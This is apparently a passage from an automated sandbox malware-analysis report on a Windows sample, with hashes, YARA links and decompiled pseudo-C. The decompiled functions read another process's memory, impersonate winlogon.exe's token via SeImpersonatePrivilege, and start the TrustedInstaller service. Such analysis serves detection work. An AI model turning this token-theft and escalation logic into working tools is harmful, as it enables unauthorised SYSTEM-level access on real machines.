                                                                                      • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                      • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                      • String ID:
                                                                                      • API String ID: 2827331108-0
                                                                                      • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                      • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                      • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                      • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 80%
                                                                                      			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				int _t43;
				int _t45;
				void* _t48;
				void* _t56;
				signed int _t57;
				long _t61;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
					if(_t43 == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
						_t69 = _t61;
						E004055D1(_t61,  &_v28);
					}
					_t45 = FindCloseChangeNotification(_a16); // executed
					E004055D1(_t45,  &_v564);
				}
				return _t69;
			}





























                                                                                      0x00401ac9
                                                                                      0x00401ad1
                                                                                      0x00401ae1
                                                                                      0x00401ae7
                                                                                      0x00401ae9
                                                                                      0x00401aec
                                                                                      0x00401c1b
                                                                                      0x00401af2
                                                                                      0x00401af2
                                                                                      0x00401af8
                                                                                      0x00401b0c
                                                                                      0x00401b12
                                                                                      0x00401b1a
                                                                                      0x00401bfd
                                                                                      0x00401b20
                                                                                      0x00401b26
                                                                                      0x00401b2b
                                                                                      0x00401b36
                                                                                      0x00401b40
                                                                                      0x00401b43
                                                                                      0x00401b4a
                                                                                      0x00401b54
                                                                                      0x00401b55
                                                                                      0x00401b56
                                                                                      0x00401b57
                                                                                      0x00401b58
                                                                                      0x00401b63
                                                                                      0x00401b68
                                                                                      0x00401b69
                                                                                      0x00401b77
                                                                                      0x00401b7d
                                                                                      0x00401b82
                                                                                      0x00401b82
                                                                                      0x00401b88
                                                                                      0x00401b8b
                                                                                      0x00401b8e
                                                                                      0x00401b91
                                                                                      0x00401b98
                                                                                      0x00401b9b
                                                                                      0x00401ba0
                                                                                      0x00401ba5
                                                                                      0x00401baa
                                                                                      0x00401bac
                                                                                      0x00401bac
                                                                                      0x00401bb2
                                                                                      0x00401bb2
                                                                                      0x00401bbe
                                                                                      0x00401bc4
                                                                                      0x00401bc6
                                                                                      0x00401bc8
                                                                                      0x00401bc8
                                                                                      0x00401bd7
                                                                                      0x00401be6
                                                                                      0x00401bee
                                                                                      0x00401bf0
                                                                                      0x00401bf0
                                                                                      0x00401c02
                                                                                      0x00401c0e
                                                                                      0x00401c0e
                                                                                      0x00401c23

                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                      • ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                      • memset.MSVCRT ref: 00401B4A
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                      • _snwprintf.MSVCRT ref: 00401B69
                                                                                        • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                        • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                      • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                      • FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                      • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
                                                                                      • String ID: %d %I64x
                                                                                      • API String ID: 1126726007-2565891505
                                                                                      • Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                      • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                      • Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                      • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 90%
                                                                                      			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                      0x00401f04
                                                                                      0x00401f20
                                                                                      0x00401f27
                                                                                      0x00401f38
                                                                                      0x00401f3f
                                                                                      0x00401f4e
                                                                                      0x00401f54
                                                                                      0x00401f5f
                                                                                      0x00401f6e
                                                                                      0x00401f72
                                                                                      0x00401f77
                                                                                      0x00401f78
                                                                                      0x00401f91
                                                                                      0x00401f7a
                                                                                      0x00401f88
                                                                                      0x00401f8e
                                                                                      0x00401f8e
                                                                                      0x00401fa6
                                                                                      0x00401fa9
                                                                                      0x00401fae
                                                                                      0x00401fb0
                                                                                      0x00401fb2
                                                                                      0x00401fb9
                                                                                      0x00401fc2
                                                                                      0x00401fca
                                                                                      0x00401fd2
                                                                                      0x00401fd2
                                                                                      0x00401fd7
                                                                                      0x00401fd7
                                                                                      0x00401fe3

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00401F27
                                                                                      • memset.MSVCRT ref: 00401F3F
                                                                                        • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                        • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                      • wcslen.MSVCRT ref: 00401F5A
                                                                                      • wcslen.MSVCRT ref: 00401F69
                                                                                      • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                        • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                        • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                      • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                      • API String ID: 3867304300-2177360481
                                                                                      • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                      • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                      • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                      • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                                      0x00401319
                                                                                      0x0040131b
                                                                                      0x00401327
                                                                                      0x0040132b
                                                                                      0x0040133a
                                                                                      0x0040134b
                                                                                      0x0040134b
                                                                                      0x0040134e
                                                                                      0x0040134e
                                                                                      0x00401353
                                                                                      0x0040135b

                                                                                      APIs
                                                                                      • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                      • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                      • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                      • String ID: TrustedInstaller
                                                                                      • API String ID: 862991418-565535830
                                                                                      • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                      • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                      • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                      • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                      0x0040955f
                                                                                      0x00409566
                                                                                      0x0040956e
                                                                                      0x00409576
                                                                                      0x00409586
                                                                                      0x00409586
                                                                                      0x0040956e
                                                                                      0x00409592
                                                                                      0x004095aa
                                                                                      0x00409594
                                                                                      0x004095a3
                                                                                      0x004095a6
                                                                                      0x004095a6

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                      • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                      • API String ID: 1714573020-3385500049
                                                                                      • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                      • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                      • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                      • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                      0x0040a348
                                                                                      0x0040a34e
                                                                                      0x0040a352
                                                                                      0x0040a35f
                                                                                      0x0040a363
                                                                                      0x0040a369
                                                                                      0x0040a371
                                                                                      0x0040a374
                                                                                      0x0040a37c
                                                                                      0x0040a380
                                                                                      0x0040a383
                                                                                      0x0040a386
                                                                                      0x0040a388
                                                                                      0x0040a388
                                                                                      0x0040a38c
                                                                                      0x0040a38f
                                                                                      0x0040a39f
                                                                                      0x0040a3a1
                                                                                      0x0040a3a5
                                                                                      0x0040a3a5
                                                                                      0x0040a3a9
                                                                                      0x0040a3aa
                                                                                      0x0040a3b3
                                                                                      0x0040a3b3
                                                                                      0x0040a37c
                                                                                      0x0040a371
                                                                                      0x0040a3b8
                                                                                      0x0040a3be

                                                                                      APIs
                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                      • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                      • String ID:
                                                                                      • API String ID: 3473537107-0
                                                                                      • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                      • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                      • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                      • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                      0x00404951
                                                                                      0x00404952
                                                                                      0x00404956
                                                                                      0x004049a1
                                                                                      0x00404958
                                                                                      0x00404959
                                                                                      0x0040495b
                                                                                      0x0040495b
                                                                                      0x0040495f
                                                                                      0x00404961
                                                                                      0x00404963
                                                                                      0x0040496d
                                                                                      0x00404975
                                                                                      0x00404977
                                                                                      0x0040497b
                                                                                      0x00404985
                                                                                      0x0040498a
                                                                                      0x0040498e
                                                                                      0x00404993
                                                                                      0x0040499d
                                                                                      0x0040499d

                                                                                      APIs
                                                                                      • malloc.MSVCRT ref: 0040496D
                                                                                      • memcpy.MSVCRT ref: 00404985
                                                                                      • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: freemallocmemcpy
                                                                                      • String ID: W@
                                                                                      • API String ID: 3056473165-1729568415
                                                                                      • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                      • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                      • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                      • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                      0x0040543f
                                                                                      0x00405456
                                                                                      0x00405462
                                                                                      0x00405467
                                                                                      0x0040546d
                                                                                      0x00405478
                                                                                      0x00405489
                                                                                      0x0040548d
                                                                                      0x00000000
                                                                                      0x00405492
                                                                                      0x00405496

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                        • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                        • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                        • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                      • wcscat.MSVCRT ref: 00405478
                                                                                      • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                      • String ID:
                                                                                      • API String ID: 3725422290-0
                                                                                      • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                      • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                      • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                      • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004056B5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 136COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004056B5(signed int __ecx, void* __eflags, signed int* _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short* _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* __edi;
				void* __esi;
				signed short* _t68;
				signed short _t72;
				intOrPtr _t80;
				void* _t82;
				void* _t85;
				intOrPtr _t90;
				signed int _t101;
				intOrPtr _t102;
				void** _t104;
				signed short* _t106;
				signed int* _t107;
				signed int _t110;

				_t94 = __ecx;
				_t101 = 0;
				_v32 = 0x22;
				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 1;
				_v8 = 0;
				_v48 = 0;
				_v36 = 0;
				_v44 = 0;
				_v40 = 0x100;
				_v52 = 0;
				_t68 = E004054B9(_a4);
				_t106 = _a8;
				if( *_t106 == 0) {
					L31:
					_t107 = _a4;
					L32:
					_t102 =  *((intOrPtr*)(_t107 + 0x1c));
					 *((intOrPtr*)(_t107 + 0x30)) = _t102;
					E004055D1(_t68,  &_v52);
					return _t102;
				}
				_v28 = _t106;
				do {
					_t72 =  *_v28 & 0x0000ffff;
					if(_t72 != 0x20 || _v8 != 0) {
						if(_t72 == 0x22 || _t72 == 0x27) {
							if(_v8 != 0) {
								if(_t72 != _v32) {
									goto L14;
								}
								_v8 = _v8 ^ 0x00000001;
								goto L25;
							}
							_v32 = _t72 & 0x0000ffff;
							_v8 = 1;
							goto L25;
						} else {
							L14:
							if(_t101 != 0) {
								L24:
								E0040559A( &_v52, _t101);
								 *((short*)(_v36 + _t101 * 2)) =  *_v28 & 0x0000ffff;
								_t106 = _a8;
								_t101 = _t101 + 1;
								_v12 = _t101;
								L25:
								_v24 = 0;
								goto L26;
							}
							if(_t72 == 0x20) {
								goto L25;
							}
							_t104 = _a4 + 0x20;
							if(_v16 >= 0) {
								_t110 = _v16;
								_t82 = _t104[2];
								if(_t110 != 0xffffffff) {
									E00404951( &(_t104[1]), _t110, _t104, 4, _t82);
								} else {
									free( *_t104);
								}
								_t85 = _t110 + 1;
								if(_t104[3] < _t85) {
									_t104[3] = _t85;
								}
								_t94 = _v20;
								 *((intOrPtr*)( *_t104 + _t110 * 4)) = _v20;
							}
							_t101 = _v12;
							goto L24;
						}
